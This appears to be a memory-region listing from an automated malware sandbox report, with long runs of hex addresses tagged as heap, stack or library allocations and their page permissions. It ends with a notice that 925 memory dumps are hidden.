page read and write
37C0000
heap
page read and write
8AA0000
trusted library allocation
page read and write
6FBE000
stack
page read and write
743E000
stack
page read and write
3360000
heap
page read and write
6C10000
heap
page execute and read and write
6928000
trusted library allocation
page read and write
2EA6000
heap
page read and write
33F1000
trusted library allocation
page read and write
31A0000
heap
page read and write
531E000
stack
page read and write
30CF000
trusted library allocation
page read and write
372D000
trusted library allocation
page execute and read and write
3418000
trusted library allocation
page read and write
308C000
trusted library allocation
page read and write
7B39000
heap
page read and write
30CC000
trusted library allocation
page read and write
6A4A000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
6937000
trusted library allocation
page read and write
50B4000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
338C000
trusted library allocation
page read and write
3553000
heap
page read and write
327D000
trusted library allocation
page read and write
5466000
trusted library allocation
page read and write
56A6000
heap
page read and write
31DD000
heap
page read and write
74E5000
heap
page read and write
5A81000
trusted library allocation
page read and write
4D00000
heap
page read and write
2DF0000
heap
page read and write
3382000
trusted library allocation
page read and write
54A5000
trusted library allocation
page read and write
68CE000
trusted library allocation
page read and write
1250000
heap
page read and write
4854000
trusted library allocation
page read and write
52DF000
stack
page read and write
3392000
trusted library allocation
page read and write
585E000
heap
page read and write
6976000
trusted library allocation
page read and write
4191000
trusted library allocation
page read and write
637D000
trusted library allocation
page read and write
2F17000
heap
page read and write
7CDE000
stack
page read and write
424A000
trusted library allocation
page read and write
623E000
stack
page read and write
31FB000
heap
page read and write
319B000
trusted library allocation
page read and write
332D000
trusted library allocation
page read and write
7A9E000
stack
page read and write
3340000
heap
page read and write
1620000
trusted library allocation
page read and write
3205000
heap
page read and write
41E9000
trusted library allocation
page read and write
4D80000
heap
page readonly
5B0000
heap
page read and write
3207000
heap
page read and write
754A000
heap
page read and write
6A96000
trusted library allocation
page read and write
969B000
trusted library allocation
page read and write
3061000
trusted library allocation
page read and write
5550000
heap
page read and write
75DD000
heap
page read and write
6DAC000
stack
page read and write
663E000
stack
page read and write
34E3000
trusted library allocation
page read and write
75C8000
heap
page read and write
3F6C000
trusted library allocation
page read and write
3441000
trusted library allocation
page read and write
6AC0000
trusted library allocation
page execute and read and write
2C90000
heap
page read and write
7DD0000
trusted library allocation
page read and write
3030000
heap
page read and write
321C000
heap
page read and write
4EAD000
trusted library allocation
page read and write
776D000
stack
page read and write
8B00000
trusted library allocation
page read and write
76DF000
stack
page read and write
5EA9000
trusted library allocation
page read and write
320D000
heap
page read and write
321C000
heap
page read and write
43B2000
trusted library allocation
page read and write
6C40000
trusted library allocation
page execute and read and write
8BC6000
trusted library section
page read and write
F73000
heap
page read and write
76BA000
heap
page read and write
338F000
trusted library allocation
page read and write
3228000
heap
page read and write
755F000
heap
page read and write
5255000
heap
page execute and read and write
2CB8000
heap
page read and write
3814000
heap
page read and write
6788000
trusted library allocation
page read and write
2BBB000
stack
page read and write
460000
heap
page read and write
32DA000
trusted library allocation
page read and write
400000
unkown
page readonly
7BF2000
heap
page read and write
9695000
trusted library allocation
page read and write
430A000
trusted library allocation
page read and write
41A2000
trusted library allocation
page read and write
69B5000
trusted library allocation
page read and write
40B5000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
33BB000
trusted library allocation
page read and write
570D000
stack
page read and write
7D1E000
stack
page read and write
3538000
trusted library allocation
page read and write
7B20000
heap
page read and write
10D9000
heap
page read and write
6369000
trusted library allocation
page read and write
333E000
stack
page read and write
69FE000
trusted library allocation
page read and write
69B2000
trusted library allocation
page read and write
6D42000
trusted library allocation
page read and write
4CF0000
trusted library allocation
page read and write
627D000
stack
page read and write
441B000
trusted library allocation
page read and write
419F000
trusted library allocation
page read and write
2F31000
trusted library allocation
page read and write
964F000
trusted library allocation
page read and write
5EEB000
trusted library allocation
page read and write
9674000
trusted library allocation
page read and write
6DEE000
stack
page read and write
56AC000
heap
page read and write
7E20000
trusted library allocation
page read and write
15F3000
trusted library allocation
page execute and read and write
7C37000
trusted library allocation
page read and write
96BF000
trusted library allocation
page read and write
6F2E000
stack
page read and write
6991000
trusted library allocation
page read and write
36D0000
heap
page read and write
60FE000
stack
page read and write
7810000
trusted library allocation
page read and write
31F2000
heap
page read and write
4274000
trusted library allocation
page read and write
352F000
trusted library allocation
page read and write
3067000
trusted library allocation
page read and write
8BD5000
trusted library section
page read and write
3420000
trusted library allocation
page read and write
7B00000
heap
page read and write
860000
heap
page read and write
5A01000
heap
page read and write
3228000
heap
page read and write
3160000
trusted library allocation
page read and write
35BC000
heap
page read and write
4377000
trusted library allocation
page read and write
1625000
trusted library allocation
page execute and read and write
435E000
trusted library allocation
page read and write
4232000
trusted library allocation
page read and write
2E89000
heap
page read and write
3208000
heap
page read and write
4239000
trusted library allocation
page read and write
31FB000
heap
page read and write
43DD000
trusted library allocation
page read and write
133E000
heap
page read and write
7AF0000
trusted library allocation
page read and write
32CF000
trusted library allocation
page read and write
9667000
trusted library allocation
page read and write
3730000
trusted library allocation
page read and write
2F2F000
stack
page read and write
4D50000
heap
page read and write
34E9000
trusted library allocation
page read and write
16B3000
heap
page read and write
719E000
stack
page read and write
432E000
trusted library allocation
page read and write
5350000
heap
page execute and read and write
56A0000
heap
page read and write
7E00000
trusted library allocation
page read and write
782F000
stack
page read and write
40C5000
trusted library allocation
page read and write
830F000
stack
page read and write
320D000
heap
page read and write
2E0C000
stack
page read and write
40C2000
trusted library allocation
page read and write
769E000
stack
page read and write
32F6000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
40A000
unkown
page write copy
5AAA000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
747E000
stack
page read and write
72FB000
stack
page read and write
7661000
heap
page read and write
7B8D000
stack
page read and write
58EE000
heap
page read and write
19A000
stack
page read and write
7635000
heap
page read and write
3198000
trusted library allocation
page read and write
437D000
trusted library allocation
page read and write
6A60000
trusted library allocation
page execute and read and write
3228000
heap
page read and write
7AE4000
trusted library allocation
page read and write
321C000
heap
page read and write
29B8000
stack
page read and write
42FC000
trusted library allocation
page read and write
2E75000
heap
page read and write
31C0000
heap
page read and write
3035000
heap
page read and write
75E1000
heap
page read and write
6F3E000
stack
page read and write
4850000
trusted library allocation
page read and write
16BE000
heap
page read and write
75F8000
heap
page read and write
329E000
trusted library allocation
page read and write
74E3000
heap
page read and write
31E2000
heap
page read and write
433B000
trusted library allocation
page read and write
5361000
trusted library allocation
page read and write
7C2E000
stack
page read and write
5520000
trusted library allocation
page read and write
33E6000
trusted library allocation
page read and write
4335000
trusted library allocation
page read and write
7642000
heap
page read and write
6F34000
trusted library allocation
page read and write
4420000
trusted library allocation
page read and write
7652000
heap
page read and write
15FD000
trusted library allocation
page execute and read and write
4E81000
trusted library allocation
page read and write
3208000
heap
page read and write
31FD000
heap
page read and write
7D80000
trusted library allocation
page read and write
8330000
heap
page read and write
437000
remote allocation
page execute and read and write
3289000
trusted library allocation
page read and write
69C0000
trusted library allocation
page read and write
31C8000
heap
page read and write
320D000
heap
page read and write
3F59000
trusted library allocation
page read and write
4329000
trusted library allocation
page read and write
15F4000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
40F7000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
812E000
stack
page read and write
696B000
trusted library allocation
page read and write
37BE000
stack
page read and write
6509000
trusted library allocation
page read and write
7ADE000
stack
page read and write
7DE0000
trusted library allocation
page read and write
339A000
trusted library allocation
page read and write
3228000
heap
page read and write
758A000
heap
page read and write
4389000
trusted library allocation
page read and write
5A14000
trusted library allocation
page read and write
7B1E000
stack
page read and write
E3A000
stack
page read and write
41F3000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
7A92000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
6920000
trusted library allocation
page read and write
4164000
trusted library allocation
page read and write
2C80000
heap
page read and write
4D90000
heap
page execute and read and write
3228000
heap
page read and write
48BA000
heap
page read and write
4CD0000
trusted library allocation
page read and write
3064000
trusted library allocation
page read and write
31E7000
heap
page read and write
3434000
trusted library allocation
page read and write
6939000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
7AF8000
trusted library allocation
page read and write
4184000
trusted library allocation
page read and write
1640000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
7A8C000
trusted library allocation
page read and write
7536000
heap
page read and write
321C000
heap
page read and write
317F000
stack
page read and write
4220000
trusted library allocation
page read and write
272F000
stack
page read and write
331D000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
31C4000
trusted library allocation
page read and write
9754000
trusted library allocation
page read and write
4346000
trusted library allocation
page read and write
3000000
heap
page read and write
7DC0000
trusted library allocation
page read and write
7D98000
trusted library allocation
page read and write
769B000
heap
page read and write
7A99000
trusted library allocation
page read and write
61FE000
stack
page read and write
42DA000
trusted library allocation
page read and write
4D3E000
stack
page read and write
69BB000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
7FCB0000
trusted library allocation
page execute and read and write
31E5000
heap
page read and write
77A0000
trusted library allocation
page read and write
314A000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
6CAA000
trusted library allocation
page read and write
31F6000
heap
page read and write
7BD0000
trusted library allocation
page read and write
40FD000
trusted library allocation
page read and write
32FD000
stack
page read and write
40D000
unkown
page read and write
4225000
trusted library allocation
page read and write
3291000
trusted library allocation
page read and write
75E3000
heap
page read and write
9648000
trusted library allocation
page read and write
41CC000
trusted library allocation
page read and write
57DE000
stack
page read and write
967A000
trusted library allocation
page read and write
7524000
heap
page read and write
344D000
trusted library allocation
page read and write
4E40000
trusted library allocation
page execute and read and write
77B0000
trusted library allocation
page read and write
3088000
trusted library allocation
page read and write
414E000
trusted library allocation
page read and write
3055000
trusted library allocation
page read and write
8AF0000
trusted library allocation
page execute and read and write
6C5E000
trusted library allocation
page read and write
7F0000
heap
page read and write
380F000
stack
page read and write
33DE000
stack
page read and write
789D000
stack
page read and write
41C6000
trusted library allocation
page read and write
75D3000
heap
page read and write
421A000
trusted library allocation
page read and write
7AAF000
trusted library allocation
page read and write
7A5E000
stack
page read and write
7D60000
trusted library allocation
page read and write
75C4000
heap
page read and write
307E000
stack
page read and write
792B000
stack
page read and write
9646000
trusted library allocation
page read and write
6830000
trusted library allocation
page execute and read and write
3710000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
762B000
heap
page read and write
52DE000
stack
page read and write
5530000
trusted library allocation
page execute and read and write
33A5000
trusted library allocation
page read and write
485D000
trusted library allocation
page execute and read and write
5A1E000
trusted library allocation
page read and write
4280000
trusted library allocation
page read and write
3724000
trusted library allocation
page read and write
3F60000
trusted library allocation
page read and write
161A000
trusted library allocation
page execute and read and write
43CB000
trusted library allocation
page read and write
2E96000
heap
page read and write
320D000
heap
page read and write
423D000
trusted library allocation
page read and write
40FA000
trusted library allocation
page read and write
6836000
trusted library allocation
page read and write
753A000
heap
page read and write
3131000
trusted library allocation
page read and write
7500000
heap
page read and write
9680000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
408000
unkown
page readonly
4413000
trusted library allocation
page read and write
7770000
trusted library allocation
page execute and read and write
445000
unkown
page readonly
78C0000
trusted library allocation
page execute and read and write
40BF000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
6935000
trusted library allocation
page read and write
692A000
trusted library allocation
page read and write
41F6000
trusted library allocation
page read and write
34BF000
trusted library allocation
page read and write
2FFC000
stack
page read and write
7DF0000
trusted library allocation
page read and write
2E20000
heap
page execute and read and write
69BE000
trusted library allocation
page read and write
7BCE000
stack
page read and write
77F0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
51C0000
heap
page read and write
73FE000
stack
page read and write
7D90000
trusted library allocation
page read and write
3F31000
trusted library allocation
page read and write
6982000
trusted library allocation
page read and write
545E000
trusted library allocation
page read and write
7692000
heap
page read and write
33FF000
trusted library allocation
page read and write
3453000
trusted library allocation
page read and write
6CAC000
stack
page read and write
3541000
trusted library allocation
page read and write
2F13000
heap
page read and write
9663000
trusted library allocation
page read and write
7E10000
trusted library allocation
page read and write
40ED000
trusted library allocation
page read and write
41B8000
trusted library allocation
page read and write
F61000
heap
page read and write
8870000
trusted library allocation
page read and write
2DCF000
stack
page read and write
58CE000
heap
page read and write
41AD000
trusted library allocation
page read and write
69B0000
trusted library allocation
page read and write
30D7000
trusted library allocation
page read and write
4860000
trusted library allocation
page read and write
6925000
trusted library allocation
page read and write
6FFE000
stack
page read and write
9669000
trusted library allocation
page read and write
6361000
trusted library allocation
page read and write
962D000
trusted library allocation
page read and write
5A1D000
heap
page read and write
88CD000
stack
page read and write
786E000
stack
page read and write
331B000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
14E0000
heap
page read and write
76C0000
heap
page read and write
5AF0000
heap
page read and write
6850000
trusted library allocation
page execute and read and write
323D000
stack
page read and write
9756000
trusted library allocation
page read and write
3720000
trusted library allocation
page read and write
2E52000
heap
page read and write
3755000
trusted library allocation
page execute and read and write
3747000
trusted library allocation
page execute and read and write
41F9000
trusted library allocation
page read and write
321C000
heap
page read and write
31E2000
heap
page read and write
77C0000
trusted library allocation
page read and write
1612000
trusted library allocation
page read and write
54B6000
trusted library allocation
page read and write
43BE000
trusted library allocation
page read and write
216E000
stack
page read and write
30BE000
trusted library allocation
page read and write
439A000
trusted library allocation
page read and write
3122000
trusted library allocation
page read and write
34EF000
stack
page read and write
7AB5000
trusted library allocation
page read and write
7615000
heap
page read and write
7CAE000
stack
page read and write
771E000
stack
page read and write
320D000
heap
page read and write
3752000
trusted library allocation
page read and write
43E3000
trusted library allocation
page read and write
4195000
trusted library allocation
page read and write
677F000
stack
page read and write
758E000
heap
page read and write
3F73000
trusted library allocation
page read and write
42C7000
trusted library allocation
page read and write
76DE000
stack
page read and write
3208000
heap
page read and write
1690000
trusted library allocation
page execute and read and write
32B0000
heap
page read and write
8230000
trusted library allocation
page execute and read and write
5B00000
trusted library allocation
page read and write
31C1000
heap
page read and write
77EE000
stack
page read and write
7ABF000
trusted library allocation
page read and write
4E50000
trusted library allocation
page read and write
41E5000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
340B000
trusted library allocation
page read and write
9AF6000
trusted library allocation
page read and write
424D000
trusted library allocation
page read and write
6F60000
trusted library allocation
page execute and read and write
54DE000
trusted library allocation
page read and write
301E000
trusted library allocation
page read and write
546D000
trusted library allocation
page read and write
4129000
trusted library allocation
page read and write
969E000
trusted library allocation
page read and write
5440000
trusted library allocation
page read and write
4FCB000
heap
page read and write
440E000
trusted library allocation
page read and write
822E000
stack
page read and write
5510000
heap
page read and write
3382000
heap
page read and write
7A7E000
stack
page read and write
7C6E000
stack
page read and write
88F3000
trusted library allocation
page read and write
35AA000
heap
page read and write
96C3000
trusted library allocation
page read and write
4247000
trusted library allocation
page read and write
35A4000
heap
page read and write
3485000
trusted library allocation
page read and write
31EA000
heap
page read and write
37C5000
heap
page read and write
78AA000
stack
page read and write
757A000
heap
page read and write
6B7A000
trusted library allocation
page read and write
32DE000
stack
page read and write
4124000
trusted library allocation
page read and write
4396000
trusted library allocation
page read and write
313F000
trusted library allocation
page read and write
306F000
trusted library allocation
page read and write
520E000
stack
page read and write
4159000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
6AE2000
trusted library allocation
page read and write
352B000
trusted library allocation
page read and write
5854000
heap
page read and write
1240000
trusted library allocation
page read and write
3228000
heap
page read and write
3201000
heap
page read and write
7760000
trusted library allocation
page read and write
420C000
trusted library allocation
page read and write
34CA000
trusted library allocation
page read and write
6A30000
trusted library allocation
page read and write
4DA0000
trusted library allocation
page read and write
4178000
trusted library allocation
page read and write
426E000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
374A000
trusted library allocation
page execute and read and write
6B2E000
trusted library allocation
page read and write
4201000
trusted library allocation
page read and write
5522000
trusted library allocation
page read and write
3FB3000
trusted library allocation
page read and write
31E1000
heap
page read and write
4D7E000
stack
page read and write
4302000
trusted library allocation
page read and write
4DA8000
trusted library allocation
page read and write
6C60000
trusted library allocation
page execute and read and write
4FEA000
heap
page read and write
755C000
heap
page read and write
6CF6000
trusted library allocation
page read and write
80AE000
stack
page read and write
7D5D000
stack
page read and write
3203000
trusted library allocation
page read and write
50CB000
stack
page read and write
41DE000
trusted library allocation
page read and write
5838000
heap
page read and write
31A8000
heap
page read and write
50D0000
trusted library allocation
page read and write
57F0000
heap
page read and write
3228000
heap
page read and write
8310000
heap
page read and write
There are 925 hidden memdumps, click here to show them.